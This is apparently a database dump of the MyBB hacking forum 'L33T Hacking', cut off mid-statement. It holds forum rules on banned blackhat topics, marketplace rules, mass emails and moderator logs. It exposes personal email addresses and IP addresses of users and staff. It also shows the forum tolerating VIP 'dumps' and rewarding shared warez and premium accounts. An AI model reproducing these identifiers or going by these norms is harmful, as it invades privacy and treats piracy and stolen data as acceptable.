    \r\nMOTM : Member of the Month
    \r\nDiamond : It\'s an award for those who are HQ members and have contributed a lot to the community also helped a lot of members.
    \r\nThinker : Has made an excellent suggestion to help improve LH.
    \r\nGenius : If you just have too much knowledge.
    \r\nAdvanced BH contributor : Has shared a lot of warez or premium accounts.
    \r\nReporter : Has reported a lot of SPAM on LH.
    \r\nElite : Special award to signify Elite status.
    \r\nBlackhat : Proven Black hatters.
    \r\n

    \r\nDonations awards are given by Jok3r only.\r\n

    \r\n
    GOOD LUCK!
    ', '0', '1', '6'); INSERT INTO mybb_helpdocs VALUES('13', '3', 'Disallowed Blackhat Activity', 'These are various additional rules restricting certain blackhat hacking activity on LH', 'These are the blackhat hacking activities that we do not allow as part of our discussions here on L33THacking. We don\'t explain the logic behind each forbidden activity, but it\'s somewhere between morality, ethics, and legality for each one. We ask that members do not participate in discussion around the following topics. If you\'ve received a warning and been asked to read this, please do so carefully.\r\n

    \r\n\r\n
    Dumps
    \r\nWe do allow dumps in the VIP sections, but we do not allow dumps on online banking accounts, online stores (EX: Amazon, Ebay) and Facebook.\r\n

    \r\n\r\n
    Financial Fraud
    \r\n\r\nWe take this very seriously. We do not allow posts in relation to these subjects. Selling information of any sort that has been stolen, in any way, is against the rules. Any information posted that\'s designed to commit financial fraud may result in the immediate closing of your account.\r\n\r\n

    \r\n\r\n\r\n
    Gift Cards and Virtual Bank Accounts (VBA)
    \r\n\r\nWe do allow discussions on VCC but not on Virtual Bank Accounts. VCC discussions are only allowed in the Social Engineering section. We do not allow discussions on Gift Cards neither you are allowed to sell, trade or buy Gift Cards.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Identity Theft
    \r\n\r\nThis is another topic we feel is purely criminal in nature and we won\'t allow that here. Topics on stealing identities will be removed immediately.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Paypal Fraud
    \r\n\r\nWith PP fraud rampant in the hacker community we feel it\'s our duty to take a stand on this one. We will not allow discussion on selling of paypal accounts, stealing accounts, or verifying accounts with false information. Basically if you\'re doing something against the TOS of paypal, you\'re breaking a rule here.\r\n\r\n

    \r\n\r\n\r\n\r\n
    Zeus and SpyEye Botnets
    \r\n\r\nThese botnets have the intended goal of stealing financial data from those who get infected. For this reason any discussions on these botnets will be closed and the member warned.\r\n\r\n

    \r\n\r\n
    Amazon/Ebay Account Trading
    \r\n\r\nAny buying, selling, or trading of Ebay/Amazon accounts is not allowed due to the fact that these accounts have credit cards and personal information attached.\r\n\r\n

    \r\n\r\n
    Fake Programs
    \r\n\r\nWe do not allow the distribution of fake programs that are infected. Nor do we allow the discussion of fake program creation.\r\n\r\n

    \r\n\r\n
    Deepweb Discussion
    \r\n\r\nDeepweb is a phrase to describe hidden websites on the internet that are often, but not always, directly related to illegal activity such as child porn, carding, hitmen, and other very illicit material. As such we\'re not going to allow it here. Not even the slightest discussion of the deepweb will be allowed.\r\n\r\n

    \r\n\r\n', '0', '1', '3'); INSERT INTO mybb_helpdocs VALUES('17', '1', 'How to become Staff?', 'General Information on becoming staff.', '
    How do I become a Staff member?
    \r\nThere are no set requirements. All you have to do is be active, be HQ, report spam and contribute to the community.\r\n

    \r\n
    When I become Staff can I abuse my privileges?
    \r\nNo, you may not abuse your privileges. You will get banned and removed from Staff.\r\n

    \r\n
    Someone asked me for a specific users personal data, should I give it to them?
    \r\nNo, tell them to PM the founder for further details.\r\n

    \r\n
    Can I become admin?
    \r\nNo and we recommend you not to ever ask any mod or Staff to become an Admin because you will get repfucked and banned.\r\n

    \r\n
    Are staff paid?
    \r\nNo! Staff, Mods and neither the Admins are paid to moderate LH. This is a complete voluntary job.\r\n

    \r\n
    Can I moderate a specific section?
    \r\nWe do have sectional mods but once again Admins are the one who pick new staff.\r\n

    \r\n\r\n\r\n\r\n', '0', '1', '0'); INSERT INTO mybb_helpdocs VALUES('14', '4', 'Marketplace Violations', 'Things that will violate LH rules and regulations of the marketplace.', '
    Can I sell for other members?
    \r\nNo you may not sell content for other members. Ban evaders, neg repped members or non-upgraded members are not allowed to use proxy on others account and sell.\r\n
    \r\n
    \r\n
    No offsite vouches
    \r\nAll vouches on a thread should include vouches from LH Members on LH. You may not use vouches from other websites. Each thread must provide at least 1 vouch copy.\r\n
    ', '0', '1', '1'); INSERT INTO mybb_helpdocs VALUES('15', '4', 'Marketplace, Scams and Safe Trading', 'Complete assistance with the Marketplace. ', '
    Rules for the Marketplace
    \r\n
      \r\n
    1. L33T Hacking will not be held responsible for deals made by members.
    2. \r\n
    3. All the trades on L33T Hacking should be made in the Marketplace section, regardless of content.
    4. \r\n
    5. We do not allow deals which are associated with credit card, bank, or identity fraud, nor any other type of illegal stock.
    6. \r\n
    7. The official rules of the forum still apply.
    8. \r\n
    \r\n
    \r\n
    Scam Reporting
    \r\n
    \r\nThe Scam Reports section is designed to alert other members of scammers. It also can serve to help resolve an issue between members. We can\'t get your money back or force a member to complete a deal. Do not PM staff. Our staff on occasion will ban a scammer, if the evidence is on site and apparent. If you got scammed, we would appreciate it if you report the scammer by making a thread in the scam reports section, \r\nwith the following content:\r\n
      \r\n
    1. Link to the scammers profile. This is to prevent confusion if a username change occurs.
    2. \r\n
    3. Link to the thread in question if it exists, where you may have been scammed.
    4. \r\n
    5. Search Scam Reports area for any existing threads with the scammer. Search by username and also uid. If everyone adds the users profile then UID will be very effective. Include such threads if found.
    6. \r\n
    7. Post any images/screenshots (or videos perhaps) that you can provide as evidence of the scam. Include short explanation for every image.
    8. \r\n
    ', '0', '1', '2'); INSERT INTO mybb_helpdocs VALUES('16', '1', 'Legal Policies and Legal Disclaimer ', 'Here you can understand the policy of LH', '\r\n
    Privacy Statement
    \r\n

    \r\nOur Commitment To Privacy\r\n

    \r\nYour privacy is important to us. To better protect your privacy we provide this notice explaining our online information practices and the choices you can make about the way your information is collected and used. To make this notice easy to find, we make it available from every page where personally identifiable information may be requested. \r\n

    \r\nThe Information We Collect:\r\n

    \r\nThis notice applies to all information collected or submitted on the L33T Hacking website. On some pages, you can order products, make requests, and register to receive materials. The types of personal information collected at these pages are: \r\n

    \r\nEmail address
    \r\nIP information \r\n

    \r\nThe Way We Use Information\r\n

    \r\nWe do not share this information with outside parties except to the extent necessary when the law requires us to comply. \r\n
    \r\nWe use email addresses to answer the emails we receive, to verify upon registration, to send opt-in only contacts such as thread subscriptions and PM notifications. Such addresses are not used for any other purpose and are not shared with outside parties. \r\n
    \r\nWe use non-identifying and aggregate information to better design our website and to share with advertisers. For example, we may tell an advertiser that X number of individuals visited a certain area on our website, or that Y number of men and Z number of women filled out our registration form, but we would not disclose anything that could be used to identify those individuals. \r\n

    \r\nAdvertising\r\n

    \r\nWe also use third party advertisements support our site. Some of these advertisers may use technology such as cookies and web beacons when they advertise on our site, which will also send these advertisers (such as Google through the Google AdSense program) information including your IP address, your ISP , the browser you used to visit our site, and in some cases, whether you have Flash installed. This is generally used for geotargeting purposes (showing New York real estate ads to someone in New York, for example), showing certain ads based on specific sites visited or provide advertisements about goods and services of interest to you (such as showing cooking ads to someone who frequents cooking sites). If you would like more information about this practice and to know your choices about not having this information used by these companies, please see: http://www.networkadvertising.org/managing/op_out\r\n

    \r\nOur website contains some affiliate marketing links, which means we get paid commission on sales of those products or services we write about. Our editorial content is not influenced by advertisers or affiliate partnerships. We use a 3rd Party to enable these affiliate partnerships. You can read their Privacy Policy and find more information on the cookies they use. \r\n
    \r\nFinally, we never use or share the personally identifiable information provided to us online in ways unrelated to the ones described above without also providing you an opportunity to opt-out or otherwise prohibit such unrelated uses. \r\n

    \r\nOur Commitment To Data Security\r\n

    \r\nTo prevent unauthorized access, maintain data accuracy, and ensure the correct use of information, we have put in place appropriate physical, electronic, and managerial procedures to safeguard and secure the information we collect online. \r\n

    \r\nOur Commitment To Children\'s Privacy\r\n

    \r\nProtecting the privacy of the very young is especially important. For that reason, we never collect or maintain information at our website from those we actually know are under 14, and no part of our website is structured to attract anyone under 14. Upon registration all children under 14 are denied. \r\n

    \r\nHow To Contact Us\r\n

    \r\nShould you have other questions or concerns about these privacy policies, please contact us from our contact form. \r\n

    \r\n
    Disclaimer
    \r\n

    \r\nNo advice\r\n

    \r\nThis website contains general information about legal matters. The information is not advice, and should not be treated as such.\r\n

    \r\nNo warranties\r\n

    \r\nThis website is provided “as is” without any representations or warranties, express or implied. L33THacking makes no representations or warranties in relation to this website or the information and materials provided on this website.\r\nWithout prejudice to the generality of the foregoing paragraph, L33THacking does not warrant that:\r\n
    \r\n
  • this website will be constantly available, or available at all; or
  • \r\n
  • the information on this website is complete, true, accurate or non-misleading.
  • \r\n
    \r\nNothing on this website constitutes, or is meant to constitute, advice of any kind. \r\n

    \r\nLimitation of warranties\r\n

    \r\nThe legal information on this website is provided “as is” without any representations or warranties, express or implied. L33THacking makes no representations or warranties in relation to the legal information on this website.
    \r\nWithout prejudice to the generality of the foregoing paragraph, L33THacking does not warrant that:\r\n
    \r\n- the legal information on this website will be constantly available, or available at all; or
    \r\n- the legal information on this website is complete, true, accurate, up-to-date, or non-misleading.\r\n

    \r\nLiability\r\n

    \r\nNothing in this legal disclaimer will limit any of our liabilities in any way that is not permitted under applicable law, or exclude any of our liabilities that may not be excluded under applicable law.\r\n

    \r\nExceptions\r\n

    \r\nNothing in this website disclaimer will exclude or limit any warranty implied by law that it would be unlawful to exclude or limit; and nothing in this website disclaimer will exclude or limit L33THacking liability in respect of any:\r\n
    \r\n• death or personal injury caused by L33THacking negligence;
    \r\n• fraud or fraudulent misrepresentation on the part of L33THacking or
    \r\n• matter which it would be illegal or unlawful for L33THacking to exclude or limit, or to attempt or purport to exclude or limit, its liability.\r\n

    \r\nReasonableness\r\n

    \r\n• By using this website, you agree that the exclusions and limitations of liability set out in this website disclaimer are reasonable.
    \r\n• If you do not think they are reasonable, you must not use this website.
    \r\n

    \r\nOther parties\r\n

    \r\n[You accept that, as a limited liability entity, L33THacking has an interest in limiting the personal liability of its officers and employees. You agree that you will not bring any claim personally against L33THacking officers or employees in respect of any losses you suffer in connection with the website.]
    \r\n[Without prejudice to the foregoing paragraph,] you agree that the limitations of warranties and liability set out in this website disclaimer will protect L33THacking officers, employees, agents, subsidiaries, successors, assigns and sub-contractors as well as L33THacking.\r\n

    \r\n
    This Website Disclaimer
    \r\n
    \r\nThis website disclaimer was been distributed by freenetlaw.com, HMSEF and Hackforums', '0', '1', '0'); DROP TABLE IF EXISTS mybb_helpsections; CREATE TABLE mybb_helpsections ( sid smallint(5) unsigned NOT NULL auto_increment, name varchar(120) NOT NULL, description text NOT NULL, usetranslation int(1) NOT NULL, enabled int(1) NOT NULL, disporder smallint(5) unsigned NOT NULL, PRIMARY KEY (sid) ); INSERT INTO mybb_helpsections VALUES('1', 'Account Information', 'Basic instructions for maintaining a forum account.', '1', '1', '2'); INSERT INTO mybb_helpsections VALUES('2', 'Posting', 'Posting, replying, and basic usage of forum.', '1', '1', '3'); INSERT INTO mybb_helpsections VALUES('3', 'General', 'General Information regarding L33THacking', '0', '1', '1'); INSERT INTO mybb_helpsections VALUES('4', 'Marketplace', 'Marketplace rules, regulations and instructions. Basically a guide around Marketplace. ', '0', '1', '1'); DROP TABLE IF EXISTS mybb_icons; CREATE TABLE mybb_icons ( iid smallint(5) unsigned NOT NULL auto_increment, name varchar(120) NOT NULL, path varchar(220) NOT NULL, PRIMARY KEY (iid) ); INSERT INTO mybb_icons VALUES('1', 'Bug', 'images/icons/bug.gif'); INSERT INTO mybb_icons VALUES('2', 'Exclamation', 'images/icons/exclamation.gif'); INSERT INTO mybb_icons VALUES('3', 'Question', 'images/icons/question.gif'); INSERT INTO mybb_icons VALUES('4', 'Smile', 'images/icons/smile.gif'); INSERT INTO mybb_icons VALUES('5', 'Sad', 'images/icons/sad.gif'); INSERT INTO mybb_icons VALUES('6', 'Wink', 'images/icons/wink.gif'); INSERT INTO mybb_icons VALUES('7', 'Big Grin', 'images/icons/biggrin.gif'); INSERT INTO mybb_icons VALUES('8', 'Tongue', 'images/icons/tongue.gif'); INSERT INTO mybb_icons VALUES('9', 'Brick', 'images/icons/brick.gif'); INSERT INTO mybb_icons VALUES('10', 'Heart', 'images/icons/heart.gif'); INSERT INTO mybb_icons VALUES('11', 'Information', 'images/icons/information.gif'); INSERT INTO mybb_icons VALUES('12', 'Lightbulb', 'images/icons/lightbulb.gif'); INSERT INTO mybb_icons VALUES('13', 'Music', 'images/icons/music.gif'); INSERT INTO mybb_icons VALUES('14', 'Photo', 'images/icons/photo.gif'); INSERT INTO mybb_icons VALUES('15', 'Rainbow', 'images/icons/rainbow.gif'); INSERT INTO mybb_icons VALUES('16', 'Shocked', 'images/icons/shocked.gif'); INSERT INTO mybb_icons VALUES('17', 'Star', 'images/icons/star.gif'); INSERT INTO mybb_icons VALUES('18', 'Thumbs Down', 'images/icons/thumbsdown.gif'); INSERT INTO mybb_icons VALUES('19', 'Thumbs Up', 'images/icons/thumbsup.gif'); INSERT INTO mybb_icons VALUES('20', 'Video', 'images/icons/video.gif'); DROP TABLE IF EXISTS mybb_joinrequests; CREATE TABLE mybb_joinrequests ( rid int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, gid smallint(5) unsigned NOT NULL, reason varchar(250) NOT NULL, dateline bigint(30) NOT NULL, PRIMARY KEY (rid) ); INSERT INTO mybb_joinrequests VALUES('1', '61', '11', 'hi', '1345479695'); DROP TABLE IF EXISTS mybb_mailerrors; CREATE TABLE mybb_mailerrors ( eid int(10) unsigned NOT NULL auto_increment, subject varchar(200) NOT NULL, message text NOT NULL, toaddress varchar(150) NOT NULL, fromaddress varchar(150) NOT NULL, dateline bigint(30) NOT NULL, error text NOT NULL, smtperror varchar(200) NOT NULL, smtpcode int(5) NOT NULL, PRIMARY KEY (eid) ); INSERT INTO mybb_mailerrors VALUES('288', 'MyBB error on L33T Hacking', 'Your copy of MyBB running on L33T Hacking (http://l33thacking.net) has experienced an error. Details of the error include:\r\n---\r\nType: 20\r\nFile: (Line no. 0)\r\nMessage\r\nSQL Error: 1327 - Undeclared variable: Array\r\nQuery: SELECT message FROM mybb_posts WHERE tid = \'1050\' LIMIT Array', 'support@l33thacking.net', 'support@l33thacking.net', '1352527172', 'The mail server does not understand the RCPT TO command. Reason: N/A', '', '0'); DROP TABLE IF EXISTS mybb_maillogs; CREATE TABLE mybb_maillogs ( mid int(10) unsigned NOT NULL auto_increment, subject varchar(200) NOT NULL, message text NOT NULL, dateline bigint(30) NOT NULL, fromuid int(10) unsigned NOT NULL, fromemail varchar(200) NOT NULL, touid bigint(30) NOT NULL, toemail varchar(200) NOT NULL, tid int(10) unsigned NOT NULL, ipaddress varchar(20) NOT NULL, PRIMARY KEY (mid) ); INSERT INTO mybb_maillogs VALUES('3', 'Hi Banekitty - From L33T Hacking Staff', 'Hi Banekitty,\r\n\r\nI read the news by The Anarchist and read about your demotion. Your account is currently banned on L33T Hacking, if you are willing to move to LH and stay active on LH then I\'ll unban your account. I\'m sure you understand the fact that LH is way better than AF because we have more advanced blackhat discussions and by becoming active on my site you will be helping us dominate AF. If you want you can also help us take down AF. You might even become a Mod if you are active on LH.\r\n\r\nRegards,\r\nL33T Hacking Staff\r\nsupport@l33thacking.net', '1351983226', '1', 'kamihafeez@hotmail.com', '251', 'banekitty@nospam.ze.tc', '0', '72.231.24.165'); DROP TABLE IF EXISTS mybb_mailqueue; CREATE TABLE mybb_mailqueue ( mid int(10) unsigned NOT NULL auto_increment, mailto varchar(200) NOT NULL, mailfrom varchar(200) NOT NULL, subject varchar(200) NOT NULL, message text NOT NULL, headers text NOT NULL, PRIMARY KEY (mid) ); DROP TABLE IF EXISTS mybb_massemails; CREATE TABLE mybb_massemails ( mid int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, subject varchar(200) NOT NULL, message text NOT NULL, htmlmessage text NOT NULL, type tinyint(1) NOT NULL, format tinyint(1) NOT NULL, dateline bigint(30) NOT NULL, senddate bigint(30) NOT NULL, status tinyint(1) NOT NULL, sentcount int(10) unsigned NOT NULL, totalcount int(10) unsigned NOT NULL, conditions text NOT NULL, perpage smallint(4) DEFAULT '50' NOT NULL, PRIMARY KEY (mid) ); INSERT INTO mybb_massemails VALUES('1', '1', 'L33THACKING.COM is Back', 'This is a quick email to let you know that L33THacking.com is back, it was offline due to some server maintenance. L33thacking is now accessible and you are free to participate with others. \r\n\r\n{bburl}\r\n{bbname}\r\n\r\nRegards,\r\n\r\nL33THacking Staff', 'This is a quick email to let you know that L33THacking.com is back, it was offline due to some server maintenance. L33thacking is now accessible and you are free to participate with others. \r\n\r\n{bburl}\r\n{bbname}\r\n\r\nRegards,\r\n\r\nL33THacking Staff', '0', '2', '1342040850', '1342040885', '3', '9', '9', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:8:{i:0;s:1:\"4\";i:1;s:1:\"5\";i:2;s:1:\"7\";i:3;s:1:\"8\";i:4;s:1:\"9\";i:5;s:2:\"10\";i:6;s:1:\"6\";i:7;s:1:\"2\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO mybb_massemails VALUES('5', '1', 'Reminder from L33THacking Forums', 'Hi {username},\r\n\r\nThis email has been sent out to remind everyone that L33THacking has moved to l33thacking.net, we do not use l33thacking.com anymore. We are sorry if this may have caused you any inconvenience. We planned to send out this email few weeks ago but today the LH staff found out that the email was not sent out due to some technical problems. \r\n\r\nIf you have forgotten your password then reset your password [url=http://l33thacking.net/member.php?action=lostpw]here[/url] and if you have forgotten your username then please send us an email through our contact form with the email you could possibly be using or your previous and current usernames.\r\n\r\nRegards,\r\nL33THacking Staff\r\nsupport@l33thacking.net\r\n', 'Hi {username},\r\n\r\nThis email has been sent out to remind everyone that L33THacking has moved to l33thacking.net, we do not use l33thacking.com anymore. We are sorry if this may have caused you any inconvenience. We planned to send out this email few weeks ago but today the LH staff found out that the email was not sent out due to some technical problems. \r\n\r\nIf you have forgotten your password then reset your password [url=http://l33thacking.net/member.php?action=lostpw]here[/url] and if you have forgotten your username then please send us an email through our contact form with the email you could possibly be using or your previous and current usernames.\r\n\r\nRegards,\r\nL33THacking Staff\r\nsupport@l33thacking.net\r\n', '0', '2', '1349760868', '1349760936', '3', '179', '179', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:9:{i:0;s:1:\"4\";i:1;s:1:\"5\";i:2;s:2:\"12\";i:3;s:1:\"9\";i:4;s:2:\"18\";i:5;s:2:\"17\";i:6;s:1:\"6\";i:7;s:1:\"2\";i:8;s:2:\"13\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO mybb_massemails VALUES('6', '1', 'Help Advertise LH', 'Hi {username},\r\n\r\nWe are looking forward to people who are willing to help advertise LH. Don\'t worry, it\'s not going to take up much of your time. It would take hardly 10 minutes or else a day. This is completely voluntary, if you are interested then answer the following questions and post them [url=http://l33thacking.net/thread-1051.html]here[/url]\r\n\r\n[quote]\r\n1. Do you have any spare email?\r\n2. Do you know any hacker blogs?\r\n3. Can you help advertise on twitter?\r\n4. What search engine do you use?\r\n5. Do you upload videos on youtube?\r\n6. Are you registered on any active site that\'s not related to hacking?\r\n7. Are you registered on hackforums or ubers?\r\n8. If we provide you with programs and ebooks, can you share them on other sites?\r\n[/quote]\r\n\r\nThanks for reading', '', '1', '0', '1350880709', '1350880769', '3', '19', '19', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:7:{i:0;s:2:\"12\";i:1;s:2:\"20\";i:2;s:1:\"9\";i:3;s:2:\"17\";i:4;s:1:\"6\";i:5;s:1:\"3\";i:6;s:2:\"13\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO mybb_massemails VALUES('7', '1', 'L33T Hacking Account Activation ', 'Hi {username},\r\n\r\nYour account on {bburl} has been manually activated. Due to some technical problems you were not able to receive an activation email.\r\n\r\nWe are sorry for the inconvenience.\r\n\r\nRegards,\r\nL33T Hacking Staff\r\n', 'Hi {username},\r\n\r\nYour account on {bburl} has been manually activated. Due to some technical problems you were not able to receive an activation email.\r\n\r\nWe are sorry for the inconvenience.\r\n\r\nRegards,\r\nL33T Hacking Staff\r\n', '0', '2', '1351741695', '1351741709', '3', '11', '11', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:1:{i:0;s:1:\"5\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO mybb_massemails VALUES('8', '1', 'Activation at L33THacking.net', 'Dear {username},\r\n\r\nDue to some technical issues you were not able to receive your account activation email. We have manually activated your account. We apologize for the inconvenience. \r\n\r\nRegards,\r\nL33T Hacking Staff\r\n{bburl}', 'Dear {username},\r\n\r\nDue to some technical issues you were not able to receive your account activation email. We have manually activated your account. We apologize for the inconvenience. \r\n\r\nRegards,\r\nL33T Hacking Staff\r\n{bburl}', '0', '2', '1352661786', '1352661802', '3', '6', '6', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:1:{i:0;s:1:\"5\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); DROP TABLE IF EXISTS mybb_mod_notify; CREATE TABLE mybb_mod_notify ( id int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, mod_id int(10) unsigned NOT NULL, from_id int(10) unsigned NOT NULL, subject text NOT NULL, message text NOT NULL, PRIMARY KEY (id) ); INSERT INTO mybb_mod_notify VALUES('1', '5', '1', '1', 'Your post has been deleted', 'Your post from thread [i]Varied Sections[/i] has been deleted by {USERNAME}. \n\n[b]Link to thread:[/b]\n [url=http://l33thacking.com/showthread.php?tid=45]showthread.php?tid=45[/url]\n'); DROP TABLE IF EXISTS mybb_moderatorlog; CREATE TABLE mybb_moderatorlog ( uid int(10) unsigned NOT NULL, dateline bigint(30) NOT NULL, fid smallint(5) unsigned NOT NULL, tid int(10) unsigned NOT NULL, pid int(10) unsigned NOT NULL, action text NOT NULL, data text NOT NULL, ipaddress varchar(50) NOT NULL, KEY tid (tid) ); INSERT INTO mybb_moderatorlog VALUES('228', '1352152092', '3', '1192', '0', 'Thread Moved', 'a:0:{}', '83.83.167.183'); INSERT INTO mybb_moderatorlog VALUES('1', '1352180418', '7', '1181', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352180429', '7', '1192', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352180749', '0', '234', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352195277', '7', '1192', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352195870', '5', '1204', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352249456', '18', '1120', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352249456', '18', '1120', '0', 'Custom Moderator Tool: Junk ', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352253808', '0', '0', '0', 'Banned User', 'a:2:{s:3:\"uid\";s:3:\"302\";s:8:\"username\";s:10:\"Mac Miller\";}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352253944', '0', '0', '0', 'Banned User', 'a:2:{s:3:\"uid\";s:3:\"326\";s:8:\"username\";s:10:\"coolkid192\";}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352253964', '0', '0', '0', 'Banned User', 'a:2:{s:3:\"uid\";s:3:\"326\";s:8:\"username\";N;}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('53', '1352314719', '0', '369', '0', 'Thread Closed', 'a:0:{}', '174.11.113.61'); INSERT INTO mybb_moderatorlog VALUES('61', '1352379350', '46', '765', '0', 'Deleted Post', 'a:0:{}', '99.252.235.12'); INSERT INTO mybb_moderatorlog VALUES('1', '1352427116', '42', '1145', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352427291', '30', '1226', '0', 'Edited Post', 'a:1:{s:3:\"pid\";s:4:\"7250\";}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('61', '1352489827', '9', '1232', '0', 'Thread Closed', 'a:0:{}', '99.252.235.12'); INSERT INTO mybb_moderatorlog VALUES('61', '1352489827', '9', '1232', '0', 'Custom Moderator Tool: Junk ', 'a:0:{}', '99.252.235.12'); INSERT INTO mybb_moderatorlog VALUES('61', '1352493759', '19', '1232', '0', 'Deleted Post', 'a:0:{}', '99.252.235.12'); INSERT INTO mybb_moderatorlog VALUES('61', '1352493784', '19', '1232', '0', 'Thread Moved', 'a:0:{}', '99.252.235.12'); INSERT INTO mybb_moderatorlog VALUES('61', '1352493803', '9', '1232', '0', 'Edited Post', 'a:1:{s:3:\"pid\";s:4:\"7289\";}', '99.252.235.12'); INSERT INTO mybb_moderatorlog VALUES('61', '1352493817', '9', '1232', '0', 'Thread Opened', 'a:0:{}', '99.252.235.12'); INSERT INTO mybb_moderatorlog VALUES('1', '1352519539', '4', '1227', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352529125', '28', '0', '0', 'Threads Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352529258', '29', '0', '0', 'Threads Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352529266', '30', '0', '0', 'Threads Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352534017', '15', '1209', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352571884', '11', '465', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352576383', '5', '1241', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352577728', '3', '0', '0', 'Threads Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352578788', '3', '1248', '0', 'Edited Post', 'a:1:{s:3:\"pid\";s:4:\"7407\";}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352578807', '3', '1248', '0', 'Edited Post', 'a:1:{s:3:\"pid\";s:4:\"7407\";}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352580597', '7', '1249', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352580694', '48', '1241', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352589764', '61', '1237', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('61', '1352599245', '3', '1236', '0', 'Deleted Post', 'a:0:{}', '99.252.235.12'); INSERT INTO mybb_moderatorlog VALUES('1', '1352603861', '3', '1251', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352604025', '3', '1248', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO mybb_moderatorlog VALUES('1', '1352678863', '56', '253', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); DROP TABLE IF EXISTS mybb_moderators; CREATE TABLE mybb_moderators ( mid smallint(5) unsigned NOT NULL auto_increment, fid smallint(5) unsigned NOT NULL, id int(10) unsigned NOT NULL, isgroup int(1) unsigned NOT NULL, caneditposts int(1) NOT NULL, candeleteposts int(1) NOT NULL, canviewips int(1) NOT NULL, canopenclosethreads int(1) NOT NULL, canmanagethreads int(1) NOT NULL, canmovetononmodforum int(1) NOT NULL, canusecustomtools int(1) NOT NULL, PRIMARY KEY (mid), KEY uid (id,fid) ); INSERT INTO mybb_moderators VALUES('1', '7', '6', '1', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('2', '11', '6', '1', '1', '1', '0', '1', '1', '1', '0'); INSERT INTO mybb_moderators VALUES('3', '17', '6', '1', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('4', '3', '6', '1', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('5', '46', '6', '1', '1', '1', '0', '1', '1', '0', '1'); INSERT INTO mybb_moderators VALUES('6', '47', '6', '1', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('13', '61', '62', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('10', '66', '61', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('11', '79', '232', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('14', '81', '100', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('15', '61', '82', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO mybb_moderators VALUES('16', '82', '228', '0', '1', '1', '0', '1', '1', '1', '1'); DROP TABLE IF EXISTS mybb_modtools; CREATE TABLE mybb_modtools ( tid smallint(5) unsigned NOT NULL auto_increment, name 